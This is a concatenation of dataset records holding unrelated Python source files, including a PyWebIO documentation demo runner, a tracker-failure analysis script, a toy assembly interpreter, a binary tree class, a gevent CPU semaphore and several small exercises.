load_pickle('20180115-def1/run5')\n datas += load_pickle('20180118-def2/run1')\n datas += load_pickle('20180119-def3/run1')\n datas += load_pickle('20180115-def1/run2')\n datas += load_pickle('20180118-def2/run3')\n datas += load_pickle('20180118-def2/run3-2')\n datas += load_pickle('20180115-def1/run1')\n datas += load_pickle('20180118-def2/run2')\n data_nor = filter_data(datas, reactor=REACTOR_GLASS_SHORT_QUAD, inductance=0)\n data_inv = load_pickle('20180201-inv/run1')\n plot_inv_ppm(data_nor, data_inv)\n plt.show()\n","sub_path":"visualize/final_v2/normal/plot_inv_ppm.py","file_name":"plot_inv_ppm.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"141825859","text":"\"\"\"\n文档中示例代码在线运行\n^^^^^^^^^^^^^^^^\n\"\"\"\nfrom pywebio import start_server\nfrom pywebio.input import *\nfrom pywebio.output import *\nfrom pywebio.session import *\nfrom os import path, listdir\nfrom functools import partial\n\nhere_dir = path.dirname(path.abspath(__file__))\n\n\ndef gen_snippets(code):\n code = code.replace('# ..demo-only', '')\n code = '\\n'.join(i for i in code.splitlines() if '# ..doc-only' not in i)\n\n parts = code.split('\\n## ----\\n')\n for p in parts:\n yield p.strip('\\n')\n\n\ndef run_code(code, scope, locals):\n with use_scope(scope):\n try:\n exec(code, globals(), locals)\n except Exception as e:\n toast('代码产生异常:\"%s:%s\"' % (type(e).__name__, e), color='error')\n\n\nIMPORT_CODE = \"\"\"from pywebio.input import *\nfrom pywebio.output import *\nfrom pywebio.session import *\n\n\"\"\"\n\n\ndef copytoclipboard(code):\n run_js(\"writeText(text)\", text=code)\n toast('已复制')\n\n\ndef handle_code(code, title):\n run_js(\"\"\"\n window.writeText = function(text) {\n const input = document.createElement('INPUT');\n input.style.opacity = 0;\n input.style.position = 'absolute';\n input.style.left = '-100000px';\n document.body.appendChild(input);\n\n input.value = text;\n input.select();\n input.setSelectionRange(0, text.length);\n document.execCommand('copy');\n document.body.removeChild(input);\n return true;\n }\n \"\"\")\n locals = {}\n if title:\n put_markdown('## %s' % title)\n\n for p in gen_snippets(code):\n with use_scope() as scope:\n put_code(p, 'python')\n\n put_buttons(['运行', '复制代码'], onclick=[\n partial(run_code, code=p, scope=scope, locals=locals),\n partial(copytoclipboard, code=IMPORT_CODE + p)\n ])\n\n put_markdown('----')\n\n hold()\n\n\ndef get_app():\n app = {}\n try:\n demos = listdir(path.join(here_dir, 'doc_domes'))\n except Exception:\n demos = []\n\n demo_infos = []\n for name in demos:\n code = open(path.join(here_dir, 'doc_domes', name)).read()\n title, code = code.split('\\n\\n', 1)\n app[name] = partial(handle_code, code=code, title=title)\n demo_infos.append([name, title])\n\n index_html = \"
      \"\n for name, title in demo_infos:\n index_html += '''
    • {name}: {desc}
    • \\n'''.format(\n name=name, desc=title)\n index_html += \"
    \"\n\n def index():\n put_markdown('# PyWebIO Document Code Example Index')\n put_html(index_html)\n\n app['index'] = index\n return app\n\n\nif __name__ == '__main__':\n start_server(get_app(), debug=True, port=8080)\n","sub_path":"demos/doc_demo.py","file_name":"doc_demo.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445425308","text":"# Задача 6. Вариант 10.\r\n# Создайте игру, в которой компьютер загадывает название одной из трех стран, \r\n# входящих в военно-политический блок \"Тройственный союз\", а игрок должен его угадать.\r\n\r\n# Kondrashkina\r\n# 15.09.2016\r\n\r\na = [\"Германия\", \"Австро-Венгрия\", \"Италия\"]\r\na1 = \"Германия\"\r\na2 = \"Австро-Венгрия\"\r\na3 = \"Италия\"\r\nimport random as random_number\r\nb = (random_number.choice(a))\r\nd = input(\"Введите одну из стран Тройственного союза: \")\r\nif (d != a1) and (d != a2) and (d != a3):\r\n\tprint(\"Такая страна не входит в союз.\")\r\nelse:\r\n\tif b == d:\r\n\t\tprint(\"Поздравляю! Ваше мнение совпало с мнением компьютера!\")\r\n\telif (b != d):\r\n\t\tprint(\"К сожалению, Вы не угадали.\")\r\n\r\n\r\n\r\n\r\n\r\ninput (\"\\n\\nНажмите Enter для выхода.\")\r\n\r\n\r\n","sub_path":"ISTp/2013/Kondrashkina_V_P/task_6_10.py","file_name":"task_6_10.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"577517339","text":"import sys\nsys.path.append('/home/jianingq/Tools/analysis/')\nsys.path.append('/home/jianingq/Tools/visualization/')\nsys.path.append('/home/jianingq/Tools/vot_tools/')\n\nfrom visualizer import Visualizer\nfrom vot_utilities import VOT_Utilities\nfrom analyzer import Analyzer\n\nroot = '/home/jianingq/Workspace/vot/SiamRPN'\nfail_gif_export_dir = '/home/jianingq/Tools/analysis/result/gif/fail/'\nfail_image_export_dir = '/home/jianingq/Tools/analysis/result/image/fail/'\nliou_gif_export_dir = '/home/jianingq/Tools/analysis/result/gif/liou/'\nliou_image_export_dir = '/home/jianingq/Tools/analysis/result/image/liou/'\nscale_gif_export_dir = '/home/jianingq/Tools/analysis/result/gif/scale/'\nscale_image_export_dir = '/home/jianingq/Tools/analysis/result/image/scale/'\n\n\ntracker_name = 'SiamRPN'\ntest_case = 'baseline'\nexperiment = 1\n\nanalyze_scale = 2\nanalyze_iou_list = [0.1, 0.2, 0.3, 0.4]\n\nvot = VOT_Utilities(root)\nvideo_names = vot.get_video_names()\n\nfor video_name in video_names[41:]:\n video_length = vot.get_frame_length(video_name)\n gts = vot.get_gts(video_name)\n results = vot.get_results(video_name, tracker_name, test_case, experiment)\n frame_tags = vot.get_frame_tags(video_name)\n video_frames = vot.get_frames(video_name)\n\n analyzer = Analyzer(gts)\n\n ious = analyzer.get_ious(results)\n scale = analyzer.get_large_scale_change(analyze_scale)\n fail = analyzer.get_fail_frames(results)\n\n #Fail Test\n if len(fail) != 0:\n for i in range(len(fail)):\n f = fail[i]\n\n segment_name = video_name + '_fail_' + 'segment{}'.format(i)\n begin = max(0, f - 15)\n end = min(f + 15, video_length)\n segment_frames = video_frames[begin:end]\n segment_gts = gts[begin:end]\n segment_results = results[begin:end]\n segment_tags = frame_tags[begin:end]\n segment_ious = ious[begin:end]\n visualizer = Visualizer()\n visualizer.save_frame(\n fail_image_export_dir,\n segment_name,\n video_frames[f],\n gts[f],\n results[f],\n tag=frame_tags[f],\n iou=ious[f])\n visualizer.generate_gif(\n 
fail_gif_export_dir,\n segment_name,\n segment_frames,\n segment_gts,\n segment_results,\n tags=segment_tags,\n ious=segment_ious)\n\n #Low IoU Test\n for analyze_iou in analyze_iou_list:\n liou = analyzer.get_low_iou(results, analyze_iou)\n if len(liou) != 0:\n for i in range(len(liou)):\n l = liou[i]\n segment_name = video_name + '_iou_' + str(analyze_iou)+'segment{}'.format(i)\n begin = max(0, l - 15)\n end = min(l + 15, video_length)\n segment_frames = video_frames[begin:end]\n segment_gts = gts[begin:end]\n segment_results = results[begin:end]\n segment_tags = frame_tags[begin:end]\n segment_ious = ious[begin:end]\n visualizer = Visualizer()\n visualizer.save_frame(\n liou_image_export_dir,\n segment_name,\n video_frames[l],\n gts[l],\n results[l],\n tag=frame_tags[l],\n iou=ious[l])\n visualizer.generate_gif(\n liou_gif_export_dir,\n segment_name,\n segment_frames,\n segment_gts,\n segment_results,\n tags=segment_tags,\n ious=segment_ious)\n \n #Scale Test\n if len(scale) != 0:\n for i in range(len(scale)):\n s = scale[i]\n\n segment_name = video_name + '_scale_' + 'segment{}'.format(i)\n begin = max(0, s - 15)\n end = min(s + 15, video_length)\n segment_frames = video_frames[begin:end]\n segment_gts = gts[begin:end]\n segment_results = results[begin:end]\n segment_tags = frame_tags[begin:end]\n segment_ious = ious[begin:end]\n visualizer = Visualizer()\n visualizer.generate_gif(\n scale_gif_export_dir,\n segment_name,\n segment_frames,\n segment_gts,\n segment_results,\n tags=segment_tags,\n ious=segment_ious)","sub_path":"analysis/run_analyzer.py","file_name":"run_analyzer.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"55753549","text":"a = 10\n\nif a > 5:\n print(\"a is greater than 5\")\nelif a > 3:\n print(\"a is less than 5, but greater than 3\")\nelse:\n print(\"a is less than 3\")\n\nb = [9, 6, 4, 2]\n\nfor x in b:\n print(x)\n\nc = True\ncnt = 0\nwhile c:\n print(\"Number %d\" % cnt)\n cnt+=1\n if cnt==10:\n c = False","sub_path":"controls.py","file_name":"controls.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"614226283","text":"import os\nfrom time import sleep\n\ndef process(regs, pos, cmd_list):\n cmd, nums = cmd_list[pos]\n if cmd == \"cpy\":\n try:\n regs[nums[1]] = regs[nums[0]]\n except KeyError:\n regs[nums[1]] = int(nums[0])\n elif cmd == \"inc\":\n regs[nums[0]] += 1\n elif cmd == \"dec\":\n regs[nums[0]] -= 1\n elif cmd == \"jnz\":\n try:\n if regs[nums[0]] != 0:\n try:\n pos += int(nums[1]) - 1\n except ValueError:\n pos += regs[nums[1]]\n except KeyError:\n if int(nums[0]) != 0:\n try:\n pos += int(nums[1]) - 1\n except ValueError:\n pos+= regs[nums[1]]\n elif cmd == \"tgl\":\n i = regs[nums[0]] + pos\n try:\n old_cmd = cmd_list[i][0]\n except IndexError:\n pass\n else:\n if len(cmd_list[i][1]) == 1:\n if old_cmd == \"inc\":\n new_cmd = \"dec\"\n else:\n new_cmd = \"inc\"\n else:\n if old_cmd == \"jnz\":\n new_cmd = \"cpy\"\n else:\n new_cmd = \"jnz\"\n try:\n cmd_list[i][0] = new_cmd\n except IndexError:\n pass\n return pos, regs, cmd_list\n\n\ndef run(filename=\"input.txt\"):\n if filename.endswith(\"input.txt\"):\n regs = {'a':7, 'b':0, 'c':0, 'd':0}\n else:\n regs = {'a':0, 'b':0, 'c':0, 'd':0}\n with open(filename) as f:\n cmd_list = []\n for line in f:\n data = line.strip().split(\" \")\n cmd_list.append([data[0], data[1:]])\n pos = 0\n count = 0\n while 
pos < len(cmd_list):\n if int(count%1) == 0:\n sleep(2)\n os.system('clear')\n print(regs)\n for cmd,i in zip(cmd_list, range(len(cmd_list))):\n if i == pos:\n print(\"%s <--\" %cmd)\n else:\n print(\"%s\" %cmd)\n print('------------')\n pos, regs, cmd_list = process(regs, pos, cmd_list)\n pos += 1\n count += 1\n return regs['a']\n\nif __name__ == \"__main__\":\n print(run())\n","sub_path":"day23_ASM_V2/python/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"128969118","text":"# -*- coding: utf-8 -*-\n\"\"\"\n scap.template\n ~~~~~~~~~~~~~\n Module for working with file templates\n\"\"\"\n\nimport jinja2\nimport yaml\n\n\nclass Template(object):\n \"\"\"Adapter class that wraps jinja2 templates.\"\"\"\n def __init__(self, name, loader, erb_syntax=False, var_file=None,\n overrides=None):\n env_args = self._make_env_args(loader, erb_syntax)\n self._env = jinja2.Environment(**env_args)\n self._template = self._env.get_template(name)\n self._overrides = overrides\n self.var_file = var_file\n\n def _make_env_args(self, loader, erb_syntax):\n \"\"\"Generate properties to pass to the jinja template.\"\"\"\n loader = jinja2.DictLoader(loader)\n env_args = {'loader': loader}\n if erb_syntax:\n env_args.update({\n 'block_start_string': '<%',\n 'block_end_string': '%>',\n 'variable_start_string': '<%=',\n 'variable_end_string': '%>',\n 'comment_start_string': '<%#',\n 'comment_end_string': '%>',\n })\n\n return env_args\n\n def _get_file_vars(self):\n \"\"\"\n Load yaml var file if it exists.\n\n :return: dict variables for template use\n \"\"\"\n if not self.var_file:\n return {}\n\n with open(self.var_file, 'r') as variables:\n return yaml.load(variables.read())\n\n def render(self):\n \"\"\"\n Renders the templates specified by `self.name`.\n\n It uses the variables sourced from the import yaml\n file specified by `self.var_file`\n \"\"\"\n template_vars = self._get_file_vars()\n if self._overrides:\n overrides = self._overrides\n overrides.update(template_vars)\n template_vars = overrides\n return self._template.render(template_vars)\n","sub_path":"scap/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131915930","text":"# This file is part of the pyMOR project (http://www.pymor.org).\n# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler\n# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)\n\nimport os\n\nfrom pymor.defaults import defaults\n\n\n\nclass Version(object):\n\n def __init__(self, revstring):\n\n # special casing for debian versions like '0.1.3~precise~ppa9'\n if '~' in revstring:\n revstring = revstring[:revstring.index('~')]\n revstringparts = revstring.strip().split('-')\n if len(revstringparts) not in (1, 3):\n raise ValueError('Invalid revstring')\n if len(revstringparts) == 3:\n self.distance = int(revstringparts[1])\n self.shorthash = revstringparts[2]\n else:\n self.distance = 0\n self.shorthash = ''\n\n version_parts = revstringparts[0].split('.')\n if version_parts[-1].find('rc') >= 0:\n s = version_parts[-1].split('rc')\n if len(s) != 2:\n raise ValueError('Invalid revstring')\n version_parts[-1] = s[0]\n self.rc_number = int(s[1])\n else:\n self.rc_number = 0\n\n self.version = tuple(int(x) for x in version_parts)\n self.full_version = self.version + (self.rc_number,)\n\n def 
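The _make_env_args() switch in scap's template.py above remaps Jinja2's delimiters so templates can use ERB-style <% %> syntax. A quick self-contained check of that configuration (the 'greet' template and its contents are illustrative):

import jinja2

env = jinja2.Environment(
    loader=jinja2.DictLoader({"greet": "Hello <%= who %>!"}),
    block_start_string="<%", block_end_string="%>",
    variable_start_string="<%=", variable_end_string="%>",
    comment_start_string="<%#", comment_end_string="%>",
)
print(env.get_template("greet").render(who="world"))  # Hello world!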
__eq__(self, other):\n if not isinstance(other, Version):\n other = Version(other)\n return self.version == other.version and self.rc_number == other.rc_number and self.distance == other.distance\n\n def __lt__(self, other):\n if not isinstance(other, Version):\n other = Version(other)\n return self.full_version < other.full_version\n\n def __gt__(self, other):\n if not isinstance(other, Version):\n other = Version(other)\n return self.full_version > other.full_version\n\n def __str__(self):\n git_part = '-{}-{}'.format(self.distance, self.shorthash) if self.distance else ''\n version_part = '.'.join(map(str, self.version))\n rc_part = 'rc{}'.format(self.rc_number) if self.rc_number else ''\n return version_part + rc_part + git_part\n\n def __repr__(self):\n return 'Version({})'.format(str(self))\n\n\nNO_VERSIONSTRING = '0.0.0-0-0'\nNO_VERSION = Version(NO_VERSIONSTRING)\n\ntry:\n if 'PYMOR_DEB_VERSION' in os.environ:\n revstring = os.environ['PYMOR_DEB_VERSION']\n else:\n import pymor.version as _version\n revstring = getattr(_version, 'revstring', NO_VERSIONSTRING)\nexcept ImportError:\n import os.path\n import subprocess\n try:\n revstring = subprocess.check_output(['git', 'describe', '--tags', '--candidates', '20', '--match', '*.*.*'],\n cwd=os.path.dirname(__file__))\n except subprocess.CalledProcessError as e:\n import sys\n sys.stderr.write('''Warning: Could not determine current pyMOR version.\nFailed to import pymor.version and 'git describe --tags --candidates 20 --match *.*.*'\nreturned\n\n{}\n\n(return code: {})\n'''.format(e.output, e.returncode))\n revstring = NO_VERSIONSTRING\nfinally:\n version = Version(revstring)\n\nVERSION = version\nprint('Loading pymor version {}'.format(VERSION))\n","sub_path":"src/pymor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"354930342","text":"#!/usr/bin/env python3\n\"\"\"\nBradley N. Miller, David L. 
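Version ordering above reduces to lexicographic comparison of (major, minor, patch, rc) tuples. A worked example; note that under this scheme an rc candidate compares greater than the corresponding final release, whose rc_number is 0:

v_old = (0, 1, 3, 0)   # 0.1.3
v_rc = (0, 2, 0, 1)    # 0.2.0rc1
v_new = (0, 2, 0, 0)   # 0.2.0
print(v_old < v_rc)    # True: (0,1,...) sorts below (0,2,...)
print(v_rc < v_new)    # False: rc_number 1 sorts above the final's 0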
Ranum\nProblem Solving with Algorithms and Data Structures using Python\nCopyright 2005\nUpdated by Roman Yasinovskyy, 2017\n\"\"\"\n\nimport operator\n\n\nclass BinaryTree:\n \"\"\"\n A recursive implementation of Binary Tree\n Using links and Nodes approach.\n\n Modified to allow for trees to be constructed from other trees\n rather than always creating a new tree in the insert_feft or insert_right\n \"\"\"\n\n def __init__(self, key):\n \"\"\"Create new tree\"\"\"\n self._key = key\n self._child_left = None\n self._child_right = None\n\n def get_root_val(self):\n \"\"\"Get root key value\"\"\"\n return self._key\n\n def set_root_val(self, key):\n \"\"\"Set root key value\"\"\"\n self._key = key\n\n root = property(get_root_val, set_root_val)\n\n def get_child_left(self):\n \"\"\"Get left child\"\"\"\n return self._child_left\n\n def set_child_left(self, node):\n \"\"\"Set left child\"\"\"\n self._child_left = node\n\n child_left = property(get_child_left, set_child_left)\n\n def get_child_right(self):\n \"\"\"Get right child\"\"\"\n return self._child_right\n\n def set_child_right(self, node):\n \"\"\"Set right child\"\"\"\n self._child_right = node\n\n child_right = property(get_child_right, set_child_right)\n\n def is_leaf(self):\n \"\"\"Check if a node is leaf\"\"\"\n return (not self._child_left) and (not self._child_right)\n\n def insert_left(self, new_node):\n \"\"\"Insert left subtree\"\"\"\n if isinstance(new_node, BinaryTree):\n new_subtree = new_node\n else:\n new_subtree = BinaryTree(new_node)\n\n if self._child_left:\n new_subtree.set_child_left(self._child_left)\n\n self._child_left = new_subtree\n\n def insert_right(self, new_node):\n \"\"\"Insert right subtree\"\"\"\n if isinstance(new_node, BinaryTree):\n new_subtree = new_node\n else:\n new_subtree = BinaryTree(new_node)\n\n if self._child_right:\n new_subtree.set_child_right(self._child_right)\n self._child_right = new_subtree\n\n def preorder(self):\n \"\"\"Pre-order tree traversal\"\"\"\n print(self._key, end=\" \")\n if self._child_left:\n self._child_left.preorder()\n if self._child_right:\n self._child_right.preorder()\n\n def inorder(self):\n \"\"\"In-order tree traversal\"\"\"\n if self._child_left:\n self._child_left.inorder()\n print(self._key, end=\" \")\n if self._child_right:\n self._child_right.inorder()\n\n def postorder(self):\n \"\"\"Post-order tree traversal\"\"\"\n if self._child_left:\n self._child_left.postorder()\n if self._child_right:\n self._child_right.postorder()\n print(self._key, end=\" \")\n\n def print_exp(self):\n \"\"\"Print an expression\"\"\"\n if self._child_left:\n print(\"(\", end=\" \")\n self._child_left.print_exp()\n print(self._key, end=\" \")\n if self._child_right:\n self._child_right.print_exp()\n print(\")\", end=\" \")\n\n def postorder_eval(self):\n \"\"\"Postorder evaluation\"\"\"\n operations = {\n \"+\": operator.add,\n \"-\": operator.sub,\n \"*\": operator.mul,\n \"/\": operator.truediv,\n }\n result_1 = None\n result_2 = None\n if self._child_left:\n result_1 = self._child_left.postorder_eval()\n if self._child_right:\n result_2 = self._child_right.postorder_eval()\n if result_1 and result_2:\n return operations[self._key](result_1, result_2)\n return self._key\n\n def height(self):\n \"\"\"Height of a tree\"\"\"\n if not self._key:\n return -1\n if self._child_left:\n height_left = self._child_left.height()\n else:\n height_left = -1\n\n if self._child_right:\n height_right = self._child_right.height()\n else:\n height_right = -1\n\n return 1 + max(height_left, 
height_right)\n\n def __len__(self):\n \"\"\"Size of a tree\"\"\"\n return self.size()\n\n def size(self):\n \"\"\"Count nodes in a tree\"\"\"\n if not self._key:\n return 0\n if self._child_left:\n children_left = self._child_left.size()\n else:\n children_left = 0\n\n if self._child_right:\n children_right = self._child_right.size()\n else:\n children_right = 0\n\n return 1 + children_left + children_right\n","sub_path":"src/lib/pythonds3/trees/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"233902801","text":"# Copyright 2019 The LUCI Authors. All rights reserved.\n# Use of this source code is governed under the Apache License, Version 2.0\n# that can be found in the LICENSE file.\n\nfrom contextlib import contextmanager\n\nimport attr\n\nfrom gevent.queue import Channel\n\n\n@attr.s\nclass CPUResource(object):\n \"\"\"Represents the machine's CPU as a limited resource.\n\n Each cpu (according to multiprocessing.cpu_count()) is worth 1000 millicores.\n Every subprocess that attempts to execute will first acquire its estimated\n amount of millicores before launching the subprocess. As soon as the\n subprocess completes, the held millicores are put back into the pool.\n\n Because recipes are finite both in runtime and number of distinct steps, this\n resource class unblocks other processes greedily. Whenever a subprocess\n completes, this analyzes all the outstanding subprocesses and will unblock\n whichever ones 'fit' in the now-freed resources. This is done in roughly FIFO\n order (i.e. if two tasks could potentially fit, the first one to block will be\n chosen over the second to unblock first).\n\n This is different than what's deemed 'fair' in a typical scheduling scenario,\n because in a mixed workload, heavy tasks could be forced to wait longer while\n small tasks use the CPU. However, because the recipes typically run with\n a hard finite timeout, it's better to use more of the CPU earlier than to\n potentially waste time waiting for small tasks to finish in order to schedule\n a heavy task earlier.\n \"\"\"\n _millicores_available = attr.ib()\n\n _millicores_max = attr.ib()\n @_millicores_max.default\n def _millicores_max_default(self):\n return self._millicores_available\n\n # List[Tuple[amount, Channel]]\n _waiters = attr.ib(factory=list)\n\n @contextmanager\n def cpu(self, amount, call_if_blocking):\n \"\"\"Block until `amount` of cpu, in millicores, is available.\n\n Requesting 0 cpu will never block or wait.\n Requesting < 0 cpu will raise ValueError.\n Requesting > _millicores_max will acquire the full CPU.\n\n Args:\n\n * amount (int) - The amount of millicores to acquire before yielding. Must\n be positive or will raise ValueError. If this exceeds the maximum amount\n of millicores available on the system, this will instead acquire the\n system maximum.\n * call_if_blocking (None|func(amount_blocked_on)) - `cpu` will invoke this\n callback if we would end up blocking before yielding. This callback\n should only be used for reporting/diagnostics (i.e. 
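postorder_eval() above evaluates an expression tree bottom-up through the operator table. A hypothetical usage sketch, assuming the BinaryTree class from the record is in scope; note in passing that the `if result_1 and result_2` guard misreads an operand of 0 as a leaf:

# Build (3 + 4) * 2 and evaluate it.
tree = BinaryTree("*")
tree.insert_left("+")
tree.insert_right(2)
tree.child_left.insert_left(3)
tree.child_left.insert_right(4)
tree.print_exp()              # ( ( 3 + 4 ) * 2 )
print()
print(tree.postorder_eval())  # 14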
it shouldn't raise\n an exception.)\n\n Yields control once the requisite amount of cpu is available.\n \"\"\"\n if amount < 0:\n raise ValueError('negative cpu amount')\n\n if amount > self._millicores_max:\n amount = self._millicores_max\n\n if amount > 0 and (self._waiters or self._millicores_available < amount):\n # we need some amount of cores AND\n # someone else is already waiting, or there aren't enough cores left.\n if call_if_blocking:\n call_if_blocking(amount - self._millicores_available)\n wake_me = Channel()\n self._waiters.append((amount, wake_me))\n wake_me.get()\n # At this point the greenlet that woke us already reserved our cores for\n # us, and we're free to go.\n else:\n # Just directly take our cores.\n assert self._millicores_available >= amount\n self._millicores_available -= amount\n\n try:\n yield\n finally:\n self._millicores_available += amount\n # We just added some resource back to the pot. Try to wake as many others\n # as we can before proceeding.\n\n to_wake, to_keep = [], []\n for waiting_amount, chan in self._waiters:\n if waiting_amount <= self._millicores_available:\n to_wake.append(chan)\n self._millicores_available -= waiting_amount\n else:\n to_keep.append((waiting_amount, chan))\n self._waiters = to_keep\n for chan in to_wake:\n chan.put(None)\n","sub_path":"recipe_engine/internal/cpu_semaphore.py","file_name":"cpu_semaphore.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"252922862","text":"class Solution:\n def findRelativeRanks(self, nums: List[int]) -> List[str]:\n nums = [(num,i) for i,num in enumerate(nums)]\n sorted_nums = sorted(nums,reverse = True)\n pos = [0 for i in range(len(nums))]\n for i,element in enumerate(sorted_nums):\n idx = element[1]\n if i == 0:\n rank = \"Gold Medal\"\n elif i == 1:\n rank = \"Silver Medal\"\n elif i == 2:\n rank = \"Bronze Medal\"\n else:\n rank = str(i+1)\n \n pos[idx] = rank\n return pos\n \n \n","sub_path":"leetcode/relative-ranks.py","file_name":"relative-ranks.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"305376722","text":"def match(s, p, h={}):\n \"\"\"\n Dynamic Programming\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n if h.get((s, p)): return h.get((s, p))\n\n if p == '' or s == '':\n h[(s, p)] = False\n return False\n\n if p == '*' or (p == '?' 
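cpu() above is a millicore-counting semaphore for gevent greenlets: acquire an estimated share before launching a subprocess, release on exit, and wake waiters in roughly FIFO order as they fit. A hypothetical usage sketch assuming the CPUResource class from the record is in scope:

import gevent

res = CPUResource(1000)  # a one-core budget of 1000 millicores

def task(name):
    # The callback fires only when the request must block.
    with res.cpu(600, lambda short: print(name, "blocked, short by", short)):
        print(name, "running")
        gevent.sleep(0.1)

# "a" acquires 600; "b" blocks (short by 200) until "a" releases.
gevent.joinall([gevent.spawn(task, "a"), gevent.spawn(task, "b")])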
and len(s) <= 1):\n h[(s, p)] = True\n return True\n\n if len(s) == len(p) and len(s) == 1:\n if s == p:\n h[(s, p)] = True\n return True\n else:\n h[(s, p)] = False\n return False\n\n for i in range(len(p)):\n if s[i] == p[i]:\n return match(s[i+1:], p[i+1:], h)\n elif p[i] == '*':\n for j in range(i, len(s)):\n if match(s[j:], p[i+1:], h):\n return True\n elif p[i] == '?':\n return match(s[i+1:], p[i+1:], h)\n else:\n return False\n\n\nif __name__ == \"__main__\":\n h = {}\n print(match('aa', 'a', h));\n h = {}\n print(match('aa', '*', h))\n h = {}\n print(match('cb', '?a', h))\n h = {}\n print(match('adceb', '*a*b', h))\n h = {}\n print(match('acdcb', 'a*c?b', h))","sub_path":"source/44_wildcard_matching.py","file_name":"44_wildcard_matching.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"282068644","text":"from floe.api import (parameter, MoleculeOutputPort, SourceCube, OEMolOStreamCube)\nfrom floe.api.orion import StreamingDataset, config_from_env, MultipartDatasetUploader\nfrom openeye import oechem\n# from floe.api.ports import BinaryMoleculeInputPort, MoleculeSerializerMixin\n# from floe.api.parameter import DataSetOutputParameter\n\n\nclass ProteinReader(SourceCube):\n title = \"Protein Reader Cube\"\n version = \"0.0.0\"\n classification = [[\"Protein Reader Cube\", \"OEChem\", \"Reader Cube\"]]\n tags = ['OEChem']\n description = \"\"\"\n A Protein Reader Cube \n Input:\n -------\n oechem.OEMCMol or - Streamed-in of the protein system\n The input file can be an .oeb, .oeb.gz, .pdb or a .mol2 file\n\n Output:\n -------\n oechem.OEMCMol - Emits the protein system\n \"\"\"\n\n success = MoleculeOutputPort(\"success\")\n\n data_in = parameter.DataSetInputParameter(\n \"data_in\",\n help_text=\"Protein to read in\",\n required=True,\n description=\"The Protein to read in\")\n\n limit = parameter.IntegerParameter(\n \"limit\",\n required=False)\n\n download_format = parameter.StringParameter(\n \"download_format\",\n choices=[\".oeb.gz\", \".oeb\", \".pdb\", \".mol2\", \".smi\"],\n required=False,\n default=\".oeb.gz\")\n\n protein_prefix = parameter.StringParameter(\n 'protein_prefix',\n default='PRT',\n help_text='The protein prefix name used to identify the protein')\n\n def begin(self):\n self.opt = vars(self.args)\n\n def __iter__(self):\n max_idx = self.args.limit\n if max_idx is not None:\n max_idx = int(max_idx)\n count = 0\n self.config = config_from_env()\n in_orion = self.config is not None\n if not in_orion:\n with oechem.oemolistream(str(self.args.data_in)) as ifs:\n for mol in ifs.GetOEMols():\n mol.SetTitle(self.opt['protein_prefix'])\n yield mol\n count += 1\n if max_idx is not None and count == max_idx:\n break\n else:\n stream = StreamingDataset(self.args.data_in,\n input_format=self.args.download_format)\n for mol in stream:\n mol.SetTitle(self.opt['protein_prefix'])\n yield mol\n count += 1\n if max_idx is not None and count == max_idx:\n break\n\n\n# class SimOutputCube(OEMolOStreamCube):\n# \"\"\"\n# A sink cube that writes molecules to a file\n# \"\"\"\n# classification = [[\"Output\"]]\n# title = \"Output Writer\"\n#\n# intake = BinaryMoleculeInputPort('intake')\n# data_out = DataSetOutputParameter('data_out',\n# required=True,\n# title='Name of Dataset to create',\n# description='The dataset to output')\n# backend = DataSetOutputParameter(\n# 'backend',\n# default=\"auto\",\n# choices=[\"db\", \"s3\", \"auto\"],\n# description=\"The Orion storage backend to 
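The memo in the wildcard matcher above is leaky: a cached False is recomputed because `h.get()` is falsy, and the results of the loop branches are never stored. A tighter memoized sketch of the same '*' / '?' recursion:

from functools import lru_cache

@lru_cache(maxsize=None)
def wc_match(s: str, p: str) -> bool:
    if not p:
        return not s
    if p[0] == '*':
        # '*' swallows zero characters, or one character and stays put
        return wc_match(s, p[1:]) or (bool(s) and wc_match(s[1:], p))
    return bool(s) and (p[0] == '?' or s[0] == p[0]) and wc_match(s[1:], p[1:])

print(wc_match('adceb', '*a*b'))   # True
print(wc_match('acdcb', 'a*c?b'))  # False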
